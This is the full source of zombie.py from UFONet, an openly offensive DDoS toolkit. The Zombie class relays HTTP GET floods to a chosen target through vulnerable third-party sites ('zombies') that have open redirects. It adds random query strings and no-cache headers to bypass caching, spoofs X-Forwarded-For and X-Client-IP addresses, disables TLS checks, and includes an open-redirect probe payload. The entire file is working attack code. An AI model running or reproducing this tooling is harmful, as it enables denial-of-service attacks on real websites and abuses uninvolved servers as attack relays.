zombie.py 12 KB

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232233234235236237238239240241242243244245246247248249250251252253254255256257258259
  1. #!/usr/bin/env python3
  2. # -*- coding: utf-8 -*-"
  3. """
  4. This file is part of the UFONet project, https://ufonet.03c8.net
  5. Copyright (c) 2013/2020 | psy <epsylon@riseup.net>
  6. You should have received a copy of the GNU General Public License along
  7. with UFONet; if not, write to the Free Software Foundation, Inc., 51
  8. Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
  9. """
  10. import io, hashlib, re, sys
  11. import time, threading, random
  12. from .randomip import RandomIP
  13. try:
  14. import pycurl
  15. except:
  16. print("\nError importing: pycurl lib. \n\n To install it on Debian based systems:\n\n $ 'sudo apt-get install python3-pycurl'\n")
  17. sys.exit(2)
  18. class Zombie: # class representing a zombie
  19. # constructor: function to construct a zombie
  20. # ufo: UFONet object, some state variables are recovered as well
  21. # zombie: name/url of zombie
  22. def __init__(self, ufo, zombie):
  23. self.ufo = ufo
  24. self.payload=ufo.payload
  25. self.attack_mode=ufo.attack_mode
  26. self.zombie = zombie
  27. self.connection_failed=True
  28. # wait for semaphore to be ready, add to herd, connect & suicide!
  29. def connect(self):
  30. reply=None
  31. with self.ufo.sem:
  32. self.ufo.herd.new_zombie(self.zombie)
  33. reply=self.do_connect()
  34. self.ufo.herd.kill_zombie(self.zombie, reply, self.connection_failed)
  35. return reply
  36. # handles zombie connection
  37. def do_connect(self):
  38. # connect zombies and manage different options: HEAD, GET, POST,
  39. # user-Agent, referer, timeout, retries, threads, delay..
  40. options = self.ufo.options
  41. c = pycurl.Curl()
  42. if self.ufo.head == True:
  43. try:
  44. c.setopt(pycurl.URL, self.zombie) # set 'self.zombie' target
  45. except:
  46. c.setopt(pycurl.URL, self.zombie.encode('utf-8'))
  47. c.setopt(pycurl.NOBODY, 1) # use HEAD
  48. if self.payload == True:
  49. payload = self.zombie + "https://www.whitehouse.gov" # Open Redirect payload [requested by all UFONet motherships ;-)]
  50. try:
  51. c.setopt(pycurl.URL, payload) # set 'self.zombie' payload
  52. except:
  53. c.setopt(pycurl.URL, payload.encode('utf-8'))
  54. c.setopt(pycurl.NOBODY, 0) # use GET
  55. if self.ufo.external == True:
  56. external_service = "https://status.ws/" # external check
  57. if options.target.startswith('https://'): # fixing url prefix
  58. options.target = options.target.replace('https://','')
  59. if options.target.startswith('http://'): # fixing url prefix
  60. options.target = options.target.replace('http://','')
  61. external = external_service + options.target
  62. try:
  63. c.setopt(pycurl.URL, external) # external HEAD check before to attack
  64. except:
  65. c.setopt(pycurl.URL, external.encode('utf-8'))
  66. c.setopt(pycurl.NOBODY, 0) # use GET
  67. if self.attack_mode == True:
  68. if options.place: # use self.zombie's vector to connect to a target's place and add a random query to evade cache
  69. random_name_hash = random.randint(1, 100000000)
  70. random_hash = random.randint(1, 100000000)
  71. if options.place.endswith("/"):
  72. options.place = re.sub('/$', '', options.place)
  73. if options.place.startswith("/"):
  74. if "?" in options.place:
  75. url_attack = self.zombie + options.target + options.place + "&" + str(random_name_hash) + "=" + str(random_hash)
  76. else:
  77. url_attack = self.zombie + options.target + options.place + "?" + str(random_name_hash) + "=" + str(random_hash)
  78. else:
  79. if "?" in options.place:
  80. url_attack = self.zombie + options.target + "/" + options.place + "&" + str(random_name_hash) + "=" + str(random_hash)
  81. else:
  82. url_attack = self.zombie + options.target + "/" + options.place + "?" + str(random_name_hash) + "=" + str(random_hash)
  83. else:
  84. url_attack = self.zombie + options.target # Use self.zombie vector to connect to original target url
  85. if self.ufo.options.verbose:
  86. print("[Info] [Zombies] Payload:", url_attack)
  87. try:
  88. c.setopt(pycurl.URL, url_attack) # GET connection on target site
  89. except:
  90. c.setopt(pycurl.URL, url_attack.encode('utf-8'))
  91. c.setopt(pycurl.NOBODY, 0) # use GET
  92. # set fake headers (important: no-cache)
  93. fakeheaders = ['Accept: image/gif, image/x-bitmap, image/jpeg, image/pjpeg',
  94. 'Connection: Keep-Alive',
  95. 'Content-type: application/x-www-form-urlencoded; charset=UTF-8',
  96. 'Cache-control: no-cache',
  97. 'Pragma: no-cache',
  98. 'Pragma-directive: no-cache',
  99. 'Cache-directive: no-cache',
  100. 'Expires: 0']
  101. c.setopt(pycurl.FOLLOWLOCATION, 1) # set follow redirects
  102. c.setopt(pycurl.MAXREDIRS, 10) # set max redirects
  103. c.setopt(pycurl.SSL_VERIFYHOST, 0) # don't verify host
  104. c.setopt(pycurl.SSL_VERIFYPEER, 0) # don't verify peer
  105. # c.setopt(pycurl.SSLVERSION, pycurl.SSLVERSION_SSLv3) # sslv3
  106. c.setopt(pycurl.COOKIEFILE, '/dev/null') # black magic
  107. c.setopt(pycurl.COOKIEJAR, '/dev/null') # black magic
  108. c.setopt(pycurl.FRESH_CONNECT, 1) # important: no cache!
  109. c.setopt(pycurl.NOSIGNAL, 1) # pass 'long' to stack to fix libcurl bug
  110. c.setopt(pycurl.ENCODING, "") # use all available encodings (black magic)
  111. if options.xforw: # set x-forwarded-for
  112. generate_random_xforw = RandomIP()
  113. xforwip = generate_random_xforw._generateip('')
  114. xforwfakevalue = ['X-Forwarded-For: ' + str(xforwip)]
  115. fakeheaders = fakeheaders + xforwfakevalue
  116. if options.xclient: # set x-client-ip
  117. generate_random_xclient = RandomIP()
  118. xclientip = generate_random_xclient._generateip('')
  119. xclientfakevalue = ['X-Client-IP: ' + str(xclientip)]
  120. fakeheaders = fakeheaders + xclientfakevalue
  121. if options.host: # set http host header
  122. host_fakevalue = ['Host: ' + str(options.host)]
  123. fakeheaders = fakeheaders + host_fakevalue
  124. c.setopt(pycurl.HTTPHEADER, fakeheaders) # set fake headers
  125. b = io.BytesIO()
  126. c.setopt(pycurl.HEADERFUNCTION, b.write)
  127. h = io.BytesIO()
  128. c.setopt(pycurl.WRITEFUNCTION, h.write)
  129. if options.agent: # set user-agent
  130. c.setopt(pycurl.USERAGENT, options.agent)
  131. else:
  132. c.setopt(pycurl.USERAGENT, self.ufo.user_agent)
  133. if options.referer: # set referer
  134. c.setopt(pycurl.REFERER, options.referer)
  135. else:
  136. c.setopt(pycurl.REFERER, self.ufo.referer)
  137. if options.proxy: # set proxy
  138. proxy = options.proxy
  139. sep = ":"
  140. proxy_ip = proxy.rsplit(sep, 1)[0]
  141. if proxy_ip.startswith('http://'):
  142. proxy_ip = proxy_ip.replace('http://', '')
  143. elif proxy_ip.startswith('https://'):
  144. proxy_ip = proxy_ip.replace('https://', '')
  145. proxy_port = proxy.rsplit(sep, 1)[1]
  146. if proxy_ip == '127.0.0.1': # working by using 'localhost' as http proxy (ex: privoxy)
  147. proxy_ip = 'localhost'
  148. c.setopt(pycurl.PROXY, proxy_ip)
  149. c.setopt(pycurl.PROXYPORT, int(proxy_port))
  150. else:
  151. c.setopt(pycurl.PROXY, '')
  152. c.setopt(pycurl.PROXYPORT, pycurl.PROXYPORT)
  153. if options.timeout: # set timeout
  154. c.setopt(pycurl.TIMEOUT, options.timeout)
  155. c.setopt(pycurl.CONNECTTIMEOUT, options.timeout)
  156. else:
  157. c.setopt(pycurl.TIMEOUT, 5) # low value trying to control OS/python overflow when too many threads are open
  158. c.setopt(pycurl.CONNECTTIMEOUT, 5)
  159. if options.delay: # set delay
  160. self.ufo.delay = options.delay
  161. else:
  162. self.ufo.delay = 0 # default delay
  163. if options.retries: # set retries
  164. self.ufo.retries = options.retries
  165. else:
  166. self.ufo.retries = 0 # default retries
  167. try: # try to connect
  168. c.perform()
  169. time.sleep(self.ufo.delay)
  170. self.connection_failed = False
  171. except Exception as e: # try retries
  172. for count in range(0, self.ufo.retries):
  173. time.sleep(self.ufo.delay)
  174. try:
  175. c.perform()
  176. self.connection_failed = False
  177. except:
  178. self.connection_failed = True
  179. if self.ufo.head == True: # HEAD reply
  180. try:
  181. reply = b.getvalue().decode('utf-8')
  182. except:
  183. try:
  184. reply = b.getvalue()
  185. except:
  186. reply = None
  187. try:
  188. code_reply = c.getinfo(pycurl.HTTP_CODE)
  189. except:
  190. code_reply = 0
  191. if reply:
  192. if options.verbose:
  193. print("[Info] [AI] HEAD Reply:")
  194. print("\n"+ reply)
  195. if self.ufo.options.testrpc:
  196. return reply
  197. else:
  198. return code_reply
  199. if self.ufo.external == True: # External reply
  200. try:
  201. external_reply = h.getvalue().decode('utf-8')
  202. except:
  203. try:
  204. external_reply = h.getvalue()
  205. except:
  206. external_reply = None
  207. if external_reply:
  208. if options.verbose:
  209. print("[Info] [AI] EXTERNAL Reply:")
  210. print("\n"+ external_reply)
  211. return external_reply
  212. if self.payload == True: # Payloads reply
  213. try:
  214. payload_reply = h.getvalue().decode('utf-8')
  215. except:
  216. try:
  217. payload_reply = h.getvalue()
  218. except:
  219. payload_reply = None
  220. if payload_reply:
  221. if options.verbose:
  222. print("[Info] [AI] PAYLOAD Reply:")
  223. print("\n"+ payload_reply)
  224. return payload_reply
  225. if self.attack_mode == True: # Attack mode reply
  226. try:
  227. attack_reply = h.getvalue().decode('utf-8')
  228. except:
  229. try:
  230. attack_reply = h.getvalue()
  231. except:
  232. attack_reply = None
  233. try:
  234. reply_code = c.getinfo(c.RESPONSE_CODE)
  235. except:
  236. reply_code = 0
  237. try:
  238. reply_time = c.getinfo(c.TOTAL_TIME)
  239. except:
  240. reply_time = 0
  241. try:
  242. reply_size = len(attack_reply)
  243. except:
  244. reply_size = 0
  245. if options.verbose:
  246. print("[Info] [AI] [Zombies] "+self.zombie+" -> REPLY (HTTP Code: "+ str(reply_code)+" | Time: "+str(reply_time)+" | Size: " + str(reply_size)+")")
  247. time.sleep(5) # managing screen (multi-threading flow time compensation)
  248. if len(attack_reply) == 0:
  249. print("[Info] [Zombies] " + self.zombie + " -> FAILED (cannot connect!)")
  250. if not self.ufo.options.disablepurge: # when purge mode discard failed zombie
  251. self.ufo.discardzombies.append(self.zombie)
  252. self.ufo.num_discard_zombies = self.ufo.num_discard_zombies + 1
  253. return [reply_code, reply_time, reply_size]